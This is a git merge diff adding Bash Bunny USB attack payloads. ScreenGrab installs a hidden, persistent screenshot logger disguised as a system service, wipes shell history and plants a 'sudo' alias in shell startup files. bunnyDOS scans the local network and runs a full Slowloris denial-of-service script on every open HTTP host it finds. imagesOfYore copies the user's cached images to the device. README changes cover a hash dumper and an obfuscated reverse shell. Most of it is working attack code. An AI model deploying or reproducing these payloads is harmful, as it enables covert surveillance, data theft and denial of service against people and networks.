Merge branch 'hak5:master' into master

payloads/library/credentials/HashDumpBunny/README.md

@@ -9,7 +9,8 @@ Version: 1.0
 This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
 
 #
-
+**!Depending on your Windows version, this might not work as intended!**
+#
 **Instruction:**
 
 Place BunnyDump.bat in the same payload switch-folder as your payload.txt

payloads/library/execution/ScreenGrab/README.md

@@ -0,0 +1,55 @@
+## About:
+* Title: screenGrab
+* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny.
+
+### Features:
+* Robust Payload for capturing snap shots of target's screen.
+* No additional dependencies required.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload:
+* Payload is divided into two modules:
+1) Deployment: In this stage payload is deployed in targets system.
+2) Exfiltration: Storing saved loot from targets system in bunny.
+
+### Payload Script's Workflow:
+* Stop storing histroy.
+* Grep bunny's mount point of bunny.
+* Creating hidden directory in /var/tmp/..... for obfuscation.
+* Copying ffmpeg and snap shot capturing mechanism in target's system.
+* Creating systemd service for persistance and triggering mechanism for autostart.
+
+### Changes to be made:
+* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Note:
+* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory.
+* Due to big size of binary, it is not provided in this repo.
+* Craete directory name `screenGrab` in `/loot/` for storing captured images.
+
+### Directory Structure of payload components:
+| FileName               | Directory                     |
+| --------------         | ----------------------------- |
+| switch1/payload.txt    | /payloads/switch1/            |
+| switch2/payload.txt    | /payloads/switch2/            |
+| screenGrab/            | /payloads/libray/             |
+
+### Usage:
+1. Deploy first payload during absence of target using `switch1`.
+2. Execute second payload during absence of target to store captured snapshots in bunny using `switch2`.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n

payloads/library/execution/ScreenGrab/screenGrab/payload.sh

@@ -0,0 +1,18 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/
+chmod +x /var/tmp/.system/ffmpeg
+mkdir /var/tmp/.system/sysLog
+cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+cp -r $mntt/payloads/library/screenGrab/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

payloads/library/execution/ScreenGrab/screenGrab/shell

@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+        echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+        echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
+fi

payloads/library/execution/ScreenGrab/screenGrab/systemBus

@@ -0,0 +1,5 @@
+while true; 
+do 
+	/var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1  /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
+	sleep 120
+done

payloads/library/execution/ScreenGrab/switch1/payload.txt

@@ -0,0 +1,56 @@
+# Title: screenGrab
+# Description: screenGrab payload captures snap shot's of target's screen periodically.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 12000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH

payloads/library/execution/ScreenGrab/switch2/payload.txt

@@ -0,0 +1,43 @@
+# Title: screenGrab
+# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+# create directory named screenGrab in /loot/
+Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER

payloads/library/execution/bunnyDOS/README.md

@@ -0,0 +1,37 @@
+## About:
+* Title: bunnyDOS
+* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS.
+
+### Features:
+* Auto scan Network.
+* Capable for DDOS.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning it(this helps to reduce physical access time as network can be large).
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName               | Directory                     |
+| --------------         | ----------------------------- |
+| payload.txt            | /payloads/switch1/            |
+| bunnyDOS/              | /payloads/libray/             |
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n

payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh

@@ -0,0 +1,19 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}')
+open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }')
+mkdir /var/tmp/.system/
+mkdir -p ~/.config/systemd/user 
+echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
+cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/
+chmod +x /var/tmp/.system/systemIO
+for i in $open
+do
+ echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler
+done
+chmod +x /var/tmp/.system/sysHandler
+systemctl --user start libSystemIO.service
+echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit

payloads/library/execution/bunnyDOS/bunnyDOS/systemIO

@@ -0,0 +1,222 @@
+#!/usr/bin/env python3
+import argparse
+import logging
+import random
+import socket
+import sys
+import time
+
+parser = argparse.ArgumentParser(
+    description="Slowloris, low bandwidth stress test tool for websites"
+)
+parser.add_argument("host", nargs="?", help="Host to perform stress test on")
+parser.add_argument(
+    "-p", "--port", default=80, help="Port of webserver, usually 80", type=int
+)
+parser.add_argument(
+    "-s",
+    "--sockets",
+    default=150,
+    help="Number of sockets to use in the test",
+    type=int,
+)
+parser.add_argument(
+    "-v",
+    "--verbose",
+    dest="verbose",
+    action="store_true",
+    help="Increases logging",
+)
+parser.add_argument(
+    "-ua",
+    "--randuseragents",
+    dest="randuseragent",
+    action="store_true",
+    help="Randomizes user-agents with each request",
+)
+parser.add_argument(
+    "-x",
+    "--useproxy",
+    dest="useproxy",
+    action="store_true",
+    help="Use a SOCKS5 proxy for connecting",
+)
+parser.add_argument(
+    "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host"
+)
+parser.add_argument(
+    "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int
+)
+parser.add_argument(
+    "--https",
+    dest="https",
+    action="store_true",
+    help="Use HTTPS for the requests",
+)
+parser.add_argument(
+    "--sleeptime",
+    dest="sleeptime",
+    default=15,
+    type=int,
+    help="Time to sleep between each header sent.",
+)
+parser.set_defaults(verbose=False)
+parser.set_defaults(randuseragent=False)
+parser.set_defaults(useproxy=False)
+parser.set_defaults(https=False)
+args = parser.parse_args()
+
+if len(sys.argv) <= 1:
+    parser.print_help()
+    sys.exit(1)
+
+if not args.host:
+    print("Host required!")
+    parser.print_help()
+    sys.exit(1)
+
+if args.useproxy:
+    # Tries to import to external "socks" library
+    # and monkey patches socket.socket to connect over
+    # the proxy by default
+    try:
+        import socks
+
+        socks.setdefaultproxy(
+            socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port
+        )
+        socket.socket = socks.socksocket
+        logging.info("Using SOCKS5 proxy for connecting...")
+    except ImportError:
+        logging.error("Socks Proxy Library Not Available!")
+
+if args.verbose:
+    logging.basicConfig(
+        format="[%(asctime)s] %(message)s",
+        datefmt="%d-%m-%Y %H:%M:%S",
+        level=logging.DEBUG,
+    )
+else:
+    logging.basicConfig(
+        format="[%(asctime)s] %(message)s",
+        datefmt="%d-%m-%Y %H:%M:%S",
+        level=logging.INFO,
+    )
+
+
+def send_line(self, line):
+    line = f"{line}\r\n"
+    self.send(line.encode("utf-8"))
+
+
+def send_header(self, name, value):
+    self.send_line(f"{name}: {value}")
+
+
+if args.https:
+    logging.info("Importing ssl module")
+    import ssl
+
+    setattr(ssl.SSLSocket, "send_line", send_line)
+    setattr(ssl.SSLSocket, "send_header", send_header)
+
+list_of_sockets = []
+user_agents = [
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
+    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
+]
+
+setattr(socket.socket, "send_line", send_line)
+setattr(socket.socket, "send_header", send_header)
+
+
+def init_socket(ip):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.settimeout(4)
+
+    if args.https:
+        ctx = ssl.create_default_context()
+        s = ctx.wrap_socket(s, server_hostname=args.host)
+
+    s.connect((ip, args.port))
+
+    s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
+
+    ua = user_agents[0]
+    if args.randuseragent:
+        ua = random.choice(user_agents)
+
+    s.send_header("User-Agent", ua)
+    s.send_header("Accept-language", "en-US,en,q=0.5")
+    return s
+
+
+def main():
+    ip = args.host
+    socket_count = args.sockets
+    logging.info("Attacking %s with %s sockets.", ip, socket_count)
+
+    logging.info("Creating sockets...")
+    for _ in range(socket_count):
+        try:
+            logging.debug("Creating socket nr %s", _)
+            s = init_socket(ip)
+        except socket.error as e:
+            logging.debug(e)
+            break
+        list_of_sockets.append(s)
+
+    while True:
+        try:
+            logging.info(
+                "Sending keep-alive headers... Socket count: %s",
+                len(list_of_sockets),
+            )
+            for s in list(list_of_sockets):
+                try:
+                    s.send_header("X-a", random.randint(1, 5000))
+                except socket.error:
+                    list_of_sockets.remove(s)
+
+            for _ in range(socket_count - len(list_of_sockets)):
+                logging.debug("Recreating socket...")
+                try:
+                    s = init_socket(ip)
+                    if s:
+                        list_of_sockets.append(s)
+                except socket.error as e:
+                    logging.debug(e)
+                    break
+            logging.debug("Sleeping for %d seconds", args.sleeptime)
+            time.sleep(args.sleeptime)
+
+        except (KeyboardInterrupt, SystemExit):
+            logging.info("Stopping Slowloris")
+            break
+
+
+if __name__ == "__main__":
+    main()

payloads/library/execution/bunnyDOS/payload.txt

@@ -0,0 +1,51 @@
+# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh \&
+Q ENTER
+Q STRING disown
+Q ENTER
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH

payloads/library/exfiltration/imagesOfYore/README.md

@@ -0,0 +1,38 @@
+## About:
+* Title: imagesOfYore
+* Description: imagesOfYore payload steals every image that target ever had in his disk.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltration
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage
+
+## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk.
+
+### Features:
+* Sotres all images(curently stored on disk and deleted too).
+* Extremly fast zstd compression for transfering images.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning 
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName               | Directory                     |
+| --------------         | ----------------------------- |
+| payload.txt            | /payloads/switch1/            |
+| imagesOfYore/          | /payloads/libray/             |
+
+### Note:
+* Create directory named `imagesOfYore` in `/loot/` for storing loot.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n

payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh

@@ -0,0 +1,9 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails
+udisksctl unmount -b /dev/$disk
+rm /tmp/script

payloads/library/exfiltration/imagesOfYore/payload.txt

@@ -0,0 +1,47 @@
+# Title: imagesOfYore
+# Description: imagesOfYore payload steals every image that target ever had in his disk.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script
+Q ENTER
+Q STRING chmod +x /tmp/script
+Q ENTER
+Q STRING /tmp/./script \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
+LED FINISH

payloads/library/remote_access/ReverseBunny/README.md

@@ -1,14 +1,14 @@
-Title:         ReverseBunny
+**Title:         ReverseBunny**
 
 Author:        0iphor13
 
-Version:       1.2
+Version:       1.3
 
 
-Getting remote access via obfuscated reverse shell.
-Change the variables in payload.txt to your attacking maschine & start your listener.
+<p>Getting remote access via obfuscated reverse shell.<br>
+Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
 
-Whats new in version 1.2?
+Whats new in version 1.3?
 - Changed the whole payload
 - Added custom shell design